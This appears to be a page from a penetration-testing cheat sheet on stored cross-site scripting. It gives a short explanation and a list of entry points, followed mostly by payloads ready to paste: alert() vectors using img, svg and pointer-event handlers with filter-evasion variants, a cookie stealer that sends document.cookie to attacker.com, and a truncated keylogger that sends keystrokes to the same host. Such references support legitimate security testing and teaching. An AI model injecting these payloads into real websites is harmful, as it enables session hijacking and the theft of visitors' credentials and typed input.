XSS Stored

It goes by the same logic of the reflected XSS except that the malicious JavaScript code is directly stored in the web application database and is executed when the user/admin/attacker visits the page where the attacker injected the code. The result is the attacker will grab the session cookie or even establish reverse shell connection. This often happens when a website allows user input that is not sanitized (remove the "bad parts" of a users input) when inserted into the database. A attacker then creates a payload in a field when signing up to a website that is stored in the websites database. If the website doesn't properly sanitize that field, when the site displays that field

on the page, it will execute the payload to everyone who visits it. Entry Points

  • Comments on a blog

  • User profile information

  • Website listings

Example Payloads


suitable for escaping input tags


suitable for escaping text areas

<img src=x onerror=alert('XSS');>
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
<svg onload=alert('XSS')>
<svg onload=alert(String.fromCharCode(88,83,83))>
<svg id=alert(1) onload=eval(id)>
// Some code<svg onload=alert(String.fromCharCode(88,83,83))>
"><svg onload=alert(/XSS/)>
<svg><script href=data:,alert(1) /> (Firefox is the only browser which allows self closing script)
<div onpointerover="alert(45)">MOVE HERE</div>
<div onpointerdown="alert(45)">MOVE HERE</div>
<div onpointerenter="alert(45)">MOVE HERE</div>
<div onpointerleave="alert(45)">MOVE HERE</div>
<div onpointermove="alert(45)">MOVE HERE</div>
<div onpointerout="alert(45)">MOVE HERE</div>
<div onpointerup="alert(45)">MOVE HERE</div>

Cookie Stealer

<script>fetch('https://attacker.com/cookie' + btoa(document.cookie));</script>



keylogger payload that records every keystroke on a certain page

<script>document.onkeypress = 
function(e) {
    fetch('https://attacker.com/log?key=' + btoa(e.key));

Last updated